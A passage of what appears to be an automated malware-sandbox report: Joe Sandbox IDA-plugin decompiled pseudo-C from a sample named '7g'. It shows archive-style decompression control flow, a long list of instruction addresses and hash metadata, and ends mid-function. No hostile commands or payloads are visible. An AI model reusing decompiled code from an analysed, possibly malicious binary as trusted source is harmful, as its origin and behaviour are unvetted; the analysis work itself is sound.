										L003CD933(_t543 - 0x68, _t647);
										_push(0x33);
										_t648 = 0x20;
										L003CD933(_t543 - 0x88, _t648);
										_t622 = _t543 - 0x58;
										_push(0x7b);
										_t649 = 0x10;
										L003CD933(_t622, _t649);
										 *(_t685 - 0x24) =  *(_t685 - 0x24) & 0x00000000;
										__eflags =  *(_t685 - 0x1c);
										if(__eflags <= 0) {
											L28:
											_t521 =  *(_t685 + 0x2c);
											__eflags =  *((intOrPtr*)(_t521 + 4)) - 0x1e;
											_t623 = _t622 & 0xffffff00 |  *((intOrPtr*)(_t521 + 4)) - 0x0000001e > 0x00000000;
											 *(_t543 - 0x48) = _t623;
											 *(_t543 - 0x47) = _t623;
											_t624 = 1;
											 *(_t543 - 0x44) = _t624;
											_t637 =  *((intOrPtr*)(_t521 + 0xc)) +  *((intOrPtr*)(_t521 + 8));
											__eflags =  *((intOrPtr*)(_t521 + 0xc)) +  *((intOrPtr*)(_t521 + 8)) - 0x1e;
											if( *((intOrPtr*)(_t521 + 0xc)) +  *((intOrPtr*)(_t521 + 8)) <= 0x1e) {
												 *(_t543 - 0x44) = 2;
											}
											__eflags =  *(_t685 + 0x1c);
											if( *(_t685 + 0x1c) != 0) {
												 *(_t543 - 0x47) = 1;
												 *(_t543 - 0x44) = _t624;
											}
											 *(_t685 - 0x10) =  *(_t685 - 0x10) + 1;
											_t543 = _t543 + 0x190;
											__eflags =  *(_t685 - 0x10) -  *(_t685 - 0x18);
											if( *(_t685 - 0x10) <  *(_t685 - 0x18)) {
												continue;
											} else {
												_t540 =  *(_t685 - 0x60);
												_t672 = 0;
												__eflags = 0;
												goto L34;
											}
										}
										_t670 = _t543 - 0x18;
										_t684 = _t543 - 0x20;
										while(1) {
											 *(_t685 - 0xc0) =  *(_t685 - 0xc0) & 0x00000000;
											 *(_t685 - 0xbc) =  *(_t685 - 0xbc) & 0x00000000;
											 *(_t685 - 4) = 3;
											_t524 = E003BA76D(0, _t670, __eflags,  *((intOrPtr*)(_t685 - 0x68)),  *(_t685 - 0x64), _t685 - 0xc0);
											__eflags = _t524;
											 *(_t685 - 0xac) = _t524;
											if(_t524 != 0) {
												break;
											}
											L00403CED(_t684,  *(_t685 - 0xc0));
											__eflags =  *_t670;
											if( *_t670 != 0) {
												L27:
												_t622 = _t685 - 0xc0;
												 *(_t685 - 4) = 1;
												E003BA87F(_t622);
												 *(_t685 - 0x24) =  *(_t685 - 0x24) + 1;
												_t684 =  &(_t684[1]);
												__eflags =  *(_t685 - 0x24) -  *(_t685 - 0x1c);
												if(__eflags < 0) {
													continue;
												}
												goto L28;
											}
											__eflags =  *_t684;
											if( *_t684 == 0) {
												 *(_t685 - 4) = 1;
												E003BA87F(_t685 - 0xc0);
												_t630 =  *(_t685 - 0x14);
												 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
												__eflags =  *(_t685 - 0x14);
												if( *(_t685 - 0x14) != 0) {
													E003C95C0(_t630, _t670, _t685, 3);
												}
												goto L1;
											}
											goto L27;
										}
										 *(_t685 - 4) = 1;
										E003BA87F(_t685 - 0xc0);
										_t627 =  *(_t685 - 0x14);
										 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
										__eflags =  *(_t685 - 0x14);
										if( *(_t685 - 0x14) != 0) {
											E003C95C0(_t627, _t670, _t685, 3);
										}
										_t673 =  *(_t685 - 0xac);
										goto L150;
									}
									__eflags =  *_t683;
									if( *_t683 == 0) {
										 *(_t685 - 4) = 1;
										E003BA87F(_t685 - 0xd0);
										_t632 =  *(_t685 - 0x14);
										 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
										__eflags =  *(_t685 - 0x14);
										if( *(_t685 - 0x14) != 0) {
											E003C95C0(_t632, _t669, _t685, 3);
										}
										_t668 = 0x80004001;
										L51:
										 *(_t685 - 4) =  *(_t685 - 4) | 0xffffffff;
										L003C9708(_t685 - 0xf4);
										_t417 = _t668;
										goto L151;
									}
									goto L22;
								}
								 *(_t685 - 4) = 1;
								E003BA87F(_t685 - 0xd0);
								_t616 =  *(_t685 - 0x14);
								 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
								__eflags =  *(_t685 - 0x14);
								if( *(_t685 - 0x14) != 0) {
									E003C95C0(_t616, _t668, _t685, 3);
								}
								goto L51;
							}
							L14:
							__eflags =  *( *(_t685 + 0x10)) - _t672;
							if( *( *(_t685 + 0x10)) != _t672) {
								goto L16;
							}
							 *(_t685 + 0x17) =  *(_t685 + 0x17) & 0x00000000;
							goto L17;
						}
						__eflags =  *((intOrPtr*)(_t685 - 0x68)) - 0x30101;
						if( *((intOrPtr*)(_t685 - 0x68)) != 0x30101) {
							goto L13;
						}
						__eflags =  *(_t685 - 0x64);
						if( *(_t685 - 0x64) == 0) {
							__eflags = _t653 - _t409;
							if(__eflags == 0) {
								__eflags = L003BDCC6(_t685 - 0xf4, __eflags);
								if(__eflags < 0) {
									E003BD15F(_t685 - 0xf4, 0xd, 1);
								}
							}
							_t535 = L003BDC99(_t685 - 0xf4, __eflags);
							__eflags = _t653 - 1;
							if(_t653 <= 1) {
								goto L14;
							}
							__eflags = _t535 - 1;
							if(_t535 > 1) {
								 *(_t685 - 0x1c) = 2;
								_t539 = _t653 + 1 >> 1;
								__eflags = _t539;
								 *(_t685 - 0x18) = _t539;
							}
						}
						goto L13;
					} else {
						_t673 = 0x80070057;
						L150:
						 *(_t685 - 4) =  *(_t685 - 4) | 0xffffffff;
						L003C9708(_t685 - 0xf4);
						_t417 = _t673;
						L151:
						 *[fs:0x0] =  *((intOrPtr*)(_t685 - 0xc));
						return _t417;
					}
				}
				L1:
				_t673 = 0x80004001;
				goto L150;
			}



































































                                                                                                    0x003ccc23
                                                                                                    0x003ccc28
                                                                                                    0x003ccc31
                                                                                                    0x003ccc34
                                                                                                    0x003ccc37
                                                                                                    0x003ccc3f
                                                                                                    0x003ccc47
                                                                                                    0x003ccc55
                                                                                                    0x003ccc5d
                                                                                                    0x003ccc60
                                                                                                    0x003ccc67
                                                                                                    0x003ccc6d
                                                                                                    0x003ccc7b
                                                                                                    0x003ccc7c
                                                                                                    0x003ccc82
                                                                                                    0x003ccc8e
                                                                                                    0x003ccc92
                                                                                                    0x003ccc94
                                                                                                    0x003ccc97
                                                                                                    0x003ccc9a
                                                                                                    0x003cccf0
                                                                                                    0x003cccf0
                                                                                                    0x003cccf3
                                                                                                    0x003ccd02
                                                                                                    0x003ccd02
                                                                                                    0x003ccd06
                                                                                                    0x003ccd06
                                                                                                    0x003ccd0c
                                                                                                    0x003ccd11
                                                                                                    0x003ccd14
                                                                                                    0x003ccd17
                                                                                                    0x003ccd1b
                                                                                                    0x003ccd1e
                                                                                                    0x003ccd21
                                                                                                    0x003ccebe
                                                                                                    0x003ccebe
                                                                                                    0x003ccec1
                                                                                                    0x003ccec4
                                                                                                    0x003ccec6
                                                                                                    0x003ccec9
                                                                                                    0x003ccecb
                                                                                                    0x003cced2
                                                                                                    0x003cced2
                                                                                                    0x003cced5
                                                                                                    0x003cced8
                                                                                                    0x003ccf19
                                                                                                    0x003ccf1c
                                                                                                    0x003ccf24
                                                                                                    0x003ccf28
                                                                                                    0x003ccf2b
                                                                                                    0x003ccf2f
                                                                                                    0x003ccf34
                                                                                                    0x003ccf38
                                                                                                    0x003ccf3b
                                                                                                    0x003ccf3f
                                                                                                    0x003ccf43
                                                                                                    0x003cd03a
                                                                                                    0x003cd03a
                                                                                                    0x003cd03d
                                                                                                    0x003cd040
                                                                                                    0x003cd169
                                                                                                    0x003cd169
                                                                                                    0x003cd16c
                                                                                                    0x003cd16e
                                                                                                    0x003cd17f
                                                                                                    0x003cd17f
                                                                                                    0x003cd183
                                                                                                    0x003cd21d
                                                                                                    0x003cd21f
                                                                                                    0x003cd221
                                                                                                    0x003ccf69
                                                                                                    0x003ccf69
                                                                                                    0x003ccf6d
                                                                                                    0x003cd587
                                                                                                    0x003cd587
                                                                                                    0x003cd590
                                                                                                    0x003cd596
                                                                                                    0x003cd599
                                                                                                    0x003cd59d
                                                                                                    0x003cd59f
                                                                                                    0x003cd5a3
                                                                                                    0x003cd5a3
                                                                                                    0x003cd5a8
                                                                                                    0x00000000
                                                                                                    0x003cd5a8
                                                                                                    0x003cd227
                                                                                                    0x003cd22a
                                                                                                    0x003cd234
                                                                                                    0x003cd234
                                                                                                    0x003cd237
                                                                                                    0x003cd243
                                                                                                    0x003cd247
                                                                                                    0x003cd24c
                                                                                                    0x003cd24f
                                                                                                    0x003cd252
                                                                                                    0x003cd255
                                                                                                    0x003cd258
                                                                                                    0x003cd25e
                                                                                                    0x003cd264
                                                                                                    0x003cd266
                                                                                                    0x003cd269
                                                                                                    0x003cd28a
                                                                                                    0x003cd28d
                                                                                                    0x003cd29a
                                                                                                    0x003cd29c
                                                                                                    0x003cd29e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cd2a7
                                                                                                    0x003cd2ab
                                                                                                    0x003cd2af
                                                                                                    0x003cd2b2
                                                                                                    0x003cd2b5
                                                                                                    0x003cd2b8
                                                                                                    0x003cd2c7
                                                                                                    0x003cd2c7
                                                                                                    0x003cd2cb
                                                                                                    0x003cd2cb
                                                                                                    0x003cd2ce
                                                                                                    0x003cd2d1
                                                                                                    0x003cd3f6
                                                                                                    0x003cd3f6
                                                                                                    0x003cd3fa
                                                                                                    0x003cd505
                                                                                                    0x003cd505
                                                                                                    0x003cd508
                                                                                                    0x003cd50a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cd519
                                                                                                    0x003cd51d
                                                                                                    0x003cd522
                                                                                                    0x003cd525
                                                                                                    0x003cd528
                                                                                                    0x003cd52b
                                                                                                    0x003cd538
                                                                                                    0x003cd53d
                                                                                                    0x003cd540
                                                                                                    0x003cd543
                                                                                                    0x003cd545
                                                                                                    0x003cd548
                                                                                                    0x003cd569
                                                                                                    0x003cd57a
                                                                                                    0x003cd57c
                                                                                                    0x003cd580
                                                                                                    0x003cd582
                                                                                                    0x003cd585
                                                                                                    0x003cd5ac
                                                                                                    0x003cd5b5
                                                                                                    0x003cd5bb
                                                                                                    0x003cd5be
                                                                                                    0x003cd5c2
                                                                                                    0x003cd5c4
                                                                                                    0x003cd5c8
                                                                                                    0x003cd5c8
                                                                                                    0x003cd5cd
                                                                                                    0x003cd5cd
                                                                                                    0x00000000
                                                                                                    0x003cd5cd
                                                                                                    0x00000000
                                                                                                    0x003cd585
                                                                                                    0x003cd54a
                                                                                                    0x003cd550
                                                                                                    0x003cd553
                                                                                                    0x003cd556
                                                                                                    0x003cd55b
                                                                                                    0x003cd55e
                                                                                                    0x003cd561
                                                                                                    0x003cd566
                                                                                                    0x003cd566
                                                                                                    0x003cd566
                                                                                                    0x00000000
                                                                                                    0x003cd550
                                                                                                    0x003cd400
                                                                                                    0x003cd403
                                                                                                    0x003cd406
                                                                                                    0x003cd409
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cd412
                                                                                                    0x003cd414
                                                                                                    0x003cd417
                                                                                                    0x003cd417
                                                                                                    0x003cd41a
                                                                                                    0x003cd41d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cd41f
                                                                                                    0x003cd41f
                                                                                                    0x003cd425
                                                                                                    0x003cd42a
                                                                                                    0x003cd42d
                                                                                                    0x003cd42f
                                                                                                    0x003cd431
                                                                                                    0x003cd433
                                                                                                    0x003cd433
                                                                                                    0x003cd431
                                                                                                    0x003cd436
                                                                                                    0x003cd439
                                                                                                    0x003cd43c
                                                                                                    0x003cd443
                                                                                                    0x003cd445
                                                                                                    0x003cd447
                                                                                                    0x003cd449
                                                                                                    0x003cd449
                                                                                                    0x003cd447
                                                                                                    0x003cd44c
                                                                                                    0x003cd44d
                                                                                                    0x003cd450
                                                                                                    0x003cd450
                                                                                                    0x003cd455
                                                                                                    0x003cd455
                                                                                                    0x003cd45b
                                                                                                    0x003cd45b
                                                                                                    0x003cd45b
                                                                                                    0x003cd45b
                                                                                                    0x003cd460
                                                                                                    0x003cd463
                                                                                                    0x003cd465
                                                                                                    0x003ccf5b
                                                                                                    0x003ccf5b
                                                                                                    0x003ccf62
                                                                                                    0x003ccf62
                                                                                                    0x003ccf62
                                                                                                    0x003ccf67
                                                                                                    0x00000000
                                                                                                    0x003ccf67
                                                                                                    0x003cd46b
                                                                                                    0x003cd46e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cd477
                                                                                                    0x003cd47b
                                                                                                    0x003cd484
                                                                                                    0x003cd48a
                                                                                                    0x003cd48d
                                                                                                    0x003cd491
                                                                                                    0x003cd493
                                                                                                    0x003cd497
                                                                                                    0x003cd497
                                                                                                    0x003cd49c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cd2d7
                                                                                                    0x003cd2d7
                                                                                                    0x003cd2e0
                                                                                                    0x003cd2e2
                                                                                                    0x003cd2e6
                                                                                                    0x003cd35b
                                                                                                    0x003cd361
                                                                                                    0x003cd2e8
                                                                                                    0x003cd2f1
                                                                                                    0x003cd300
                                                                                                    0x003cd304
                                                                                                    0x003cd31c
                                                                                                    0x003cd326
                                                                                                    0x003cd335
                                                                                                    0x003cd338
                                                                                                    0x003cd33b
                                                                                                    0x003cd33e
                                                                                                    0x003cd344
                                                                                                    0x003cd347
                                                                                                    0x003cd34e
                                                                                                    0x003cd353
                                                                                                    0x003cd353
                                                                                                    0x003cd36a
                                                                                                    0x003cd371
                                                                                                    0x003cd373
                                                                                                    0x003cd377
                                                                                                    0x003cd377
                                                                                                    0x003cd378
                                                                                                    0x003cd37c
                                                                                                    0x003cd37f
                                                                                                    0x003cd3d3
                                                                                                    0x003cd3db
                                                                                                    0x003cd3dd
                                                                                                    0x003cd3df
                                                                                                    0x003cd4d4
                                                                                                    0x003cd4d7
                                                                                                    0x003cd4db
                                                                                                    0x003cd4e4
                                                                                                    0x003cd4ea
                                                                                                    0x003cd4ed
                                                                                                    0x003cd4f1
                                                                                                    0x003cd4f3
                                                                                                    0x003cd4fb
                                                                                                    0x003cd4fb
                                                                                                    0x00000000
                                                                                                    0x003cd4f3
                                                                                                    0x003cd381
                                                                                                    0x003cd381
                                                                                                    0x003cd384
                                                                                                    0x003cd387
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cd38c
                                                                                                    0x003cd38c
                                                                                                    0x003cd390
                                                                                                    0x003cd392
                                                                                                    0x003cd395
                                                                                                    0x003cd397
                                                                                                    0x003cd39a
                                                                                                    0x003cd39c
                                                                                                    0x003cd39e
                                                                                                    0x003cd39e
                                                                                                    0x003cd39a
                                                                                                    0x003cd3ab
                                                                                                    0x003cd3b6
                                                                                                    0x003cd3bb
                                                                                                    0x003cd3bd
                                                                                                    0x003cd3c0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cd3c6
                                                                                                    0x003cd3cc
                                                                                                    0x003cd3cf
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cd3d1
                                                                                                    0x003cd4a7
                                                                                                    0x003cd4ab
                                                                                                    0x003cd4b4
                                                                                                    0x003cd4ba
                                                                                                    0x003cd4bd
                                                                                                    0x003cd4c1
                                                                                                    0x003cd4c3
                                                                                                    0x003cd4c7
                                                                                                    0x003cd4c7
                                                                                                    0x003cd4cc
                                                                                                    0x00000000
                                                                                                    0x003cd4cc
                                                                                                    0x003cd3e5
                                                                                                    0x003cd3e5
                                                                                                    0x003cd3eb
                                                                                                    0x003cd3eb
                                                                                                    0x003cd3f4
                                                                                                    0x003cd3f4
                                                                                                    0x00000000
                                                                                                    0x003cd3f4
                                                                                                    0x003cd2bd
                                                                                                    0x003cd2bf
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cd2c1
                                                                                                    0x00000000
                                                                                                    0x003cd2c1
                                                                                                    0x003cd26b
                                                                                                    0x003cd271
                                                                                                    0x003cd274
                                                                                                    0x003cd277
                                                                                                    0x003cd27c
                                                                                                    0x003cd27f
                                                                                                    0x003cd282
                                                                                                    0x003cd287
                                                                                                    0x003cd287
                                                                                                    0x003cd287
                                                                                                    0x00000000
                                                                                                    0x003cd271
                                                                                                    0x003cd22c
                                                                                                    0x003cd22c
                                                                                                    0x00000000
                                                                                                    0x003cd22c
                                                                                                    0x003cd189
                                                                                                    0x003cd18c
                                                                                                    0x003cd18f
                                                                                                    0x003cd1c4
                                                                                                    0x003cd1ca
                                                                                                    0x003cd1d3
                                                                                                    0x003cd1d8
                                                                                                    0x003cd1db
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cd1dd
                                                                                                    0x003cd1df
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cd1e1
                                                                                                    0x003cd191
                                                                                                    0x003cd197
                                                                                                    0x003cd19d
                                                                                                    0x003cd1a2
                                                                                                    0x003cd1a4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cd1aa
                                                                                                    0x003cd1ac
                                                                                                    0x003cd1ae
                                                                                                    0x003cd1b1
                                                                                                    0x003cd1e9
                                                                                                    0x003cd1ed
                                                                                                    0x003cd1f6
                                                                                                    0x003cd1fc
                                                                                                    0x003cd1ff
                                                                                                    0x003cd203
                                                                                                    0x003cd205
                                                                                                    0x003cd209
                                                                                                    0x003cd209
                                                                                                    0x003cd20e
                                                                                                    0x00000000
                                                                                                    0x003cd20e
                                                                                                    0x003cd1b3
                                                                                                    0x003cd1b6
                                                                                                    0x003cd1bf
                                                                                                    0x003cd1c2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cd1c2
                                                                                                    0x00000000
                                                                                                    0x003cd197
                                                                                                    0x003cd175
                                                                                                    0x003cd177
                                                                                                    0x003cd179
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cd046
                                                                                                    0x003cd046
                                                                                                    0x003cd049
                                                                                                    0x003cd052
                                                                                                    0x003cd054
                                                                                                    0x003cd056
                                                                                                    0x003cd058
                                                                                                    0x003cd066
                                                                                                    0x003cd080
                                                                                                    0x003cd090
                                                                                                    0x003cd093
                                                                                                    0x003cd09a
                                                                                                    0x003cd09a
                                                                                                    0x003cd09d
                                                                                                    0x003cd0aa
                                                                                                    0x003cd0aa
                                                                                                    0x003cd0af
                                                                                                    0x003cd0b2
                                                                                                    0x003cd0bc
                                                                                                    0x003cd0bf
                                                                                                    0x003cd0bf
                                                                                                    0x003cd0c1
                                                                                                    0x003cd0c6
                                                                                                    0x003cd0c9
                                                                                                    0x003cd0e4
                                                                                                    0x003cd0e4
                                                                                                    0x003cd0e4
                                                                                                    0x003cd0cb
                                                                                                    0x003cd0cd
                                                                                                    0x003cd0d0
                                                                                                    0x003cd0d3
                                                                                                    0x003cd0d6
                                                                                                    0x003cd0d9
                                                                                                    0x003cd0dc
                                                                                                    0x003cd0dc
                                                                                                    0x003cd0ee
                                                                                                    0x003cd0f1
                                                                                                    0x003cd0fc
                                                                                                    0x003cd0ff
                                                                                                    0x003cd0ff
                                                                                                    0x003cd0ff
                                                                                                    0x003cd102
                                                                                                    0x003cd102
                                                                                                    0x003cd107
                                                                                                    0x003cd10b
                                                                                                    0x003cd10d
                                                                                                    0x003cd113
                                                                                                    0x003cd119
                                                                                                    0x003cd11c
                                                                                                    0x003cd11c
                                                                                                    0x003cd11c
                                                                                                    0x003cd11c
                                                                                                    0x003cd120
                                                                                                    0x003cd124
                                                                                                    0x003cd136
                                                                                                    0x003cd13a
                                                                                                    0x003cd13d
                                                                                                    0x003cd140
                                                                                                    0x003cd146
                                                                                                    0x003cd14e
                                                                                                    0x003cd150
                                                                                                    0x003cd152
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cd152
                                                                                                    0x00000000
                                                                                                    0x003cd124
                                                                                                    0x003cd05a
                                                                                                    0x003cd061
                                                                                                    0x003cd063
                                                                                                    0x003cd063
                                                                                                    0x003cd065
                                                                                                    0x00000000
                                                                                                    0x003cd065
                                                                                                    0x003cd05c
                                                                                                    0x003cd05f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cd158
                                                                                                    0x003cd158
                                                                                                    0x003cd15e
                                                                                                    0x003cd15e
                                                                                                    0x003cd167
                                                                                                    0x003cd167
                                                                                                    0x00000000
                                                                                                    0x003cd167
                                                                                                    0x003ccf49
                                                                                                    0x003ccf4e
                                                                                                    0x003ccf53
                                                                                                    0x003ccf55
                                                                                                    0x003cd02d
                                                                                                    0x003cd031
                                                                                                    0x003cd037
                                                                                                    0x00000000
                                                                                                    0x003cd037
                                                                                                    0x00000000
                                                                                                    0x003cceda
                                                                                                    0x003ccedd
                                                                                                    0x003ccee3
                                                                                                    0x003ccee6
                                                                                                    0x003ccef0
                                                                                                    0x003ccef8
                                                                                                    0x003ccefb
                                                                                                    0x003ccf00
                                                                                                    0x003ccf06
                                                                                                    0x003ccf09
                                                                                                    0x003ccf0c
                                                                                                    0x003ccf12
                                                                                                    0x003ccf12
                                                                                                    0x003ccf12
                                                                                                    0x003ccf12
                                                                                                    0x003ccf17
                                                                                                    0x003ccf17
                                                                                                    0x00000000
                                                                                                    0x003ccf17
                                                                                                    0x003cced8
                                                                                                    0x003ccd27
                                                                                                    0x003ccd27
                                                                                                    0x003ccd2d
                                                                                                    0x003ccd2d
                                                                                                    0x003ccd35
                                                                                                    0x003ccd3d
                                                                                                    0x003ccd47
                                                                                                    0x003ccd4e
                                                                                                    0x003ccd57
                                                                                                    0x003ccd5d
                                                                                                    0x003ccd65
                                                                                                    0x003ccd66
                                                                                                    0x003ccd6c
                                                                                                    0x003ccd6c
                                                                                                    0x003ccd7a
                                                                                                    0x003ccd84
                                                                                                    0x003ccd8d
                                                                                                    0x003ccd8f
                                                                                                    0x003ccd91
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ccd9d
                                                                                                    0x003ccda5
                                                                                                    0x003ccdaa
                                                                                                    0x003ccdad
                                                                                                    0x003ccdb8
                                                                                                    0x003ccdbe
                                                                                                    0x003ccdc2
                                                                                                    0x003ccdca
                                                                                                    0x003ccdce
                                                                                                    0x003ccdcf
                                                                                                    0x003ccdda
                                                                                                    0x003ccdde
                                                                                                    0x003ccddf
                                                                                                    0x003ccde4
                                                                                                    0x003ccde7
                                                                                                    0x003ccdeb
                                                                                                    0x003ccdec
                                                                                                    0x003ccdf1
                                                                                                    0x003ccdf5
                                                                                                    0x003ccdf9
                                                                                                    0x003cce6f
                                                                                                    0x003cce6f
                                                                                                    0x003cce74
                                                                                                    0x003cce78
                                                                                                    0x003cce7b
                                                                                                    0x003cce7e
                                                                                                    0x003cce81
                                                                                                    0x003cce82
                                                                                                    0x003cce88
                                                                                                    0x003cce8b
                                                                                                    0x003cce8e
                                                                                                    0x003cce90
                                                                                                    0x003cce90
                                                                                                    0x003cce97
                                                                                                    0x003cce9b
                                                                                                    0x003cce9d
                                                                                                    0x003ccea1
                                                                                                    0x003ccea1
                                                                                                    0x003ccea4
                                                                                                    0x003ccea7
                                                                                                    0x003cceb0
                                                                                                    0x003cceb3
                                                                                                    0x00000000
                                                                                                    0x003cceb9
                                                                                                    0x003cceb9
                                                                                                    0x003ccebc
                                                                                                    0x003ccebc
                                                                                                    0x00000000
                                                                                                    0x003ccebc
                                                                                                    0x003cceb3
                                                                                                    0x003ccdfb
                                                                                                    0x003ccdfe
                                                                                                    0x003cce01
                                                                                                    0x003cce01
                                                                                                    0x003cce08
                                                                                                    0x003cce1d
                                                                                                    0x003cce24
                                                                                                    0x003cce29
                                                                                                    0x003cce2b
                                                                                                    0x003cce31
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cce3f
                                                                                                    0x003cce44
                                                                                                    0x003cce47
                                                                                                    0x003cce52
                                                                                                    0x003cce52
                                                                                                    0x003cce58
                                                                                                    0x003cce5c
                                                                                                    0x003cce61
                                                                                                    0x003cce64
                                                                                                    0x003cce6a
                                                                                                    0x003cce6d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cce6d
                                                                                                    0x003cce49
                                                                                                    0x003cce4c
                                                                                                    0x003cd006
                                                                                                    0x003cd00a
                                                                                                    0x003cd00f
                                                                                                    0x003cd012
                                                                                                    0x003cd016
                                                                                                    0x003cd018
                                                                                                    0x003cd020
                                                                                                    0x003cd020
                                                                                                    0x00000000
                                                                                                    0x003cd018
                                                                                                    0x00000000
                                                                                                    0x003cce4c
                                                                                                    0x003ccfda
                                                                                                    0x003ccfde
                                                                                                    0x003ccfe3
                                                                                                    0x003ccfe6
                                                                                                    0x003ccfea
                                                                                                    0x003ccfec
                                                                                                    0x003ccff0
                                                                                                    0x003ccff0
                                                                                                    0x003ccff5
                                                                                                    0x00000000
                                                                                                    0x003ccff5
                                                                                                    0x003ccdaf
                                                                                                    0x003ccdb2
                                                                                                    0x003ccf9e
                                                                                                    0x003ccfa2
                                                                                                    0x003ccfa7
                                                                                                    0x003ccfaa
                                                                                                    0x003ccfae
                                                                                                    0x003ccfb0
                                                                                                    0x003ccfb4
                                                                                                    0x003ccfb4
                                                                                                    0x003ccfb9
                                                                                                    0x003ccfbe
                                                                                                    0x003ccfbe
                                                                                                    0x003ccfc8
                                                                                                    0x003ccfcd
                                                                                                    0x00000000
                                                                                                    0x003ccfcd
                                                                                                    0x00000000
                                                                                                    0x003ccdb2
                                                                                                    0x003ccf7b
                                                                                                    0x003ccf7f
                                                                                                    0x003ccf84
                                                                                                    0x003ccf87
                                                                                                    0x003ccf8b
                                                                                                    0x003ccf8d
                                                                                                    0x003ccf91
                                                                                                    0x003ccf91
                                                                                                    0x00000000
                                                                                                    0x003ccf8d
                                                                                                    0x003cccf5
                                                                                                    0x003cccf8
                                                                                                    0x003cccfa
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cccfc
                                                                                                    0x00000000
                                                                                                    0x003cccfc
                                                                                                    0x003ccc9c
                                                                                                    0x003ccca3
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ccca5
                                                                                                    0x003ccca8
                                                                                                    0x003cccaa
                                                                                                    0x003cccac
                                                                                                    0x003cccb9
                                                                                                    0x003cccbb
                                                                                                    0x003cccc7
                                                                                                    0x003cccc7
                                                                                                    0x003cccbb
                                                                                                    0x003cccd2
                                                                                                    0x003cccd7
                                                                                                    0x003cccda
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cccdc
                                                                                                    0x003cccdf
                                                                                                    0x003ccce4
                                                                                                    0x003ccceb
                                                                                                    0x003ccceb
                                                                                                    0x003ccced
                                                                                                    0x003ccced
                                                                                                    0x003cccdf
                                                                                                    0x00000000
                                                                                                    0x003ccc84
                                                                                                    0x003ccc84
                                                                                                    0x003cd5cf
                                                                                                    0x003cd5cf
                                                                                                    0x003cd5d9
                                                                                                    0x003cd5de
                                                                                                    0x003cd5e0
                                                                                                    0x003cd5e6
                                                                                                    0x003cd5ee
                                                                                                    0x003cd5ee
                                                                                                    0x003ccc82
                                                                                                    0x003ccc6f
                                                                                                    0x003ccc6f
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003CCC23
                                                                                                      • Part of subcall function 003CD94B: __EH_prolog.LIBCMT ref: 003CD950
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: a97aef2e0a705950186ec804bba058d78ebe8a246d49195064103ff802016798
                                                                                                    • Instruction ID: 411482e1ea64b5145f9ac7e0fe4f56457c1facccdc34c0d15a70b1a8e5067618
                                                                                                    • Opcode Fuzzy Hash: a97aef2e0a705950186ec804bba058d78ebe8a246d49195064103ff802016798
                                                                                                    • Instruction Fuzzy Hash: F4625771900259CFDF26DFA4C885BEEBBB5AF08304F1540AEE909AB281D7749E45CF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B8F28 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 76libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 79%
                                                                                                    			E003B8F28(WCHAR* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v5;
				WCHAR* _v12;
				long _v16;
				long _v20;
				long _v24;
				long _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				char _v52;
				_Unknown_base(*)()* _t37;
				signed int _t43;
				void* _t49;
				intOrPtr* _t54;
				signed int _t60;
				intOrPtr* _t61;
				signed int* _t62;

				_v5 = _v5 & 0x00000000;
				_t62 = __edx;
